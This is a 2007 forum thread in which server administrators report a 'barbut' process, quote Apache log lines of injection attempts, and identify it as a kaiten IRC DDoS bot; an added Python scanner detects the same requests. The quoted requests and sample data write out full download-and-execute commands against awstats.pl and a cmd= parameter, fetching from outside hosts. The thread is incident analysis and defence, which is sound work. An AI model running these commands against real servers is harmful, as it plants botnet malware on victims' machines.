Re: barbut process using 100% cpu and connecting - Firewalls



Thread: Re: barbut process using 100% cpu and connecting

  1. Re: barbut process using 100% cpu and connecting

    A long gap since this post, but I've just noticed "barbut" in our web
    server logs, googled, and found nothing but this query:

    On Jul 16, 6:15pm Jens Hoffman wrote:

    > krzysiek schrieb:
    > > there was a process called "barbut" (2 of them) using 49,2% CPU time
    > > each :O
    > > meanwhile netstat showed established connections to 195.73.177.146:666
    > > + several waiting.
    >
    > Some host in .nl.
    >
    > > I have no idea where did this process come from. Any clues?
    >
    > I don't know about you, but I would take the machine off the net and
    > try to understand what happened.

    I hope the original poster did that - here's the "barbut" occurrence in
    our apache log:

    GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1

    (there are four attempts, trying different paths to awstats.pl)

    I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as
    'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

    Googling for some of those names finds this is probably the source code:

    http://packetstormsecurity.nl/irc/kaiten.c

    The comments start:

    "This is a IRC based distributed denial of service client. It connects
    to the server specified below and accepts commands via the channel
    specified."

    Hope this was useful,
    A.


  2. Re: barbut process using 100% cpu and connecting

    On 19 Nov, 10:03, "A" wrote:
    > Googling for some of those names finds this is probably the source code:
    >
    > http://packetstormsecurity.nl/irc/kaiten.c


    I've found similar requests in yesterday's log (19/Nov/2007:20:02:53
    +0100)
    "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1"

    W.r.t. the sources mentioned above, barbut.c has been changed,
    including the following differences:

    * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
    * The server list has been replaced by the single entry "217.79.176.126"
    * The initial connection has changed from port 6667 to port 113
    * The "run command" macro has changed from "SH " to "ZK "
    * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE %s +iwx"

    That didn't apparently succeed, so I don't know who are the victims...
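Both request shapes quoted in this thread (the awstats.pl configdir value opening with a pipe in the first post, and the cmd= parameter carrying a chain of shell commands in the second) can be picked out of an Apache access log by a small scanner. The Python below is an added example written for this page; it is not code from any of the posters, from the kaiten source, or from Sophos. The log lines are constructed to mirror the quoted requests, the client addresses are hypothetical, and the two rule regexes are this editor's own approximations rather than any vendor signature.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache access-log lines (hypothetical client addresses),
# modelled on the two request strings quoted in this thread, plus one benign
# awstats request for contrast. Line 3 carries raw spaces, as the second
# post's log excerpt does, to show that the parser copes with that.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Nov/2007:20:02:53 +0100] "GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0"
10.0.0.5 - - [19/Nov/2007:20:02:54 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0"
10.0.0.7 - - [19/Nov/2007:20:02:53 +0100] "GET /?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [19/Nov/2007:20:03:10 +0100] "GET /awstats.pl?config=site1&output=main HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Common/combined log format: client, timestamp and the request line. The
# request target is matched lazily up to " HTTP/x.y" so that unencoded
# spaces inside it do not break the parse.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)"'
)

# Rule 1: awstats.pl called with a configdir value that opens with a pipe,
# the shell-injection shape seen in the first post.
AWSTATS_INJECT = re.compile(r"awstats\.pl\?.*configdir=\|", re.I)
# Rule 2: a cmd= parameter whose value contains shell chaining characters,
# the shape seen in the second post.
CMD_CHAIN = re.compile(r"[?&]cmd=[^&]*[;|`]", re.I)
# Download targets handed to wget/curl inside the injected command, ending
# at whitespace or a shell separator.
FETCH_TARGET = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*([^\s;|&'\"]+)", re.I)


def host_of(target: str) -> str:
    """Reduce a wget/curl target like http://host/path or host/path to host."""
    return re.sub(r"^\w+://", "", target).split("/")[0]


def scan_log(text: str) -> list:
    """Return one finding per log line that matches an injection rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m.group("target"))  # undo %20 etc. before matching
        if AWSTATS_INJECT.search(decoded):
            rule = "awstats-configdir-injection"
        elif CMD_CHAIN.search(decoded):
            rule = "cmd-parameter-shell-chain"
        else:
            continue
        findings.append({
            "client": m.group("client"),
            "time": m.group("time"),
            "rule": rule,
            "download_hosts": [host_of(t) for t in FETCH_TARGET.findall(decoded)],
            "request": decoded,
        })
    return findings


def indicator_hosts(findings: list) -> list:
    """Distinct download hosts across all findings, e.g. for an egress block-list."""
    return sorted({h for f in findings for h in f["download_hosts"]})


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f'{f["time"]} {f["client"]} {f["rule"]} hosts={f["download_hosts"]}')
    print("download hosts to block:", indicator_hosts(hits))
```

Decoding the target before matching matters: the first post's request hides its spaces as %20, so a rule written against the raw line would need to know every encoding the attacker might use. The download hosts pulled from the wget arguments are the useful by-product: they are what to block at the egress firewall and what to look for in outbound connection logs. A 404 on the awstats request is not proof the attempt failed on a different path, so a hit from this scanner is a reason to check /tmp for the dropped file and the process list for it running, as the first post's correspondents did.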

  3. Re: barbut process using 100% cpu and connecting

    On Nov 20, 1:46 am, ale2007 wrote:
    > On 19 Nov, 10:03, "A" wrote:
    > > Googling for some of those names finds this is probably the source code:
    > >
    > > http://packetstormsecurity.nl/irc/kaiten.c
    >
    > I've found similar requests in yesterday's log (19/Nov/2007:20:02:53
    > +0100)
    > "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1"
    >
    > W.r.t. the sources mentioned above, barbut.c has been changed,
    > including the following differences:
    >
    > * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
    > * The server list has been replaced by the single entry "217.79.176.126"
    > * The initial connection has changed from port 6667 to port 113
    > * The "run command" macro has changed from "SH " to "ZK "
    > * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE %s +iwx"
    >
    > That didn't apparently succeed, so I don't know who are the victims...


    I found the same connection to my Imail server and Sophos posted this
    a few minutes ago.

    http://www.sophos.com/security/analy...ojkaitenw.html
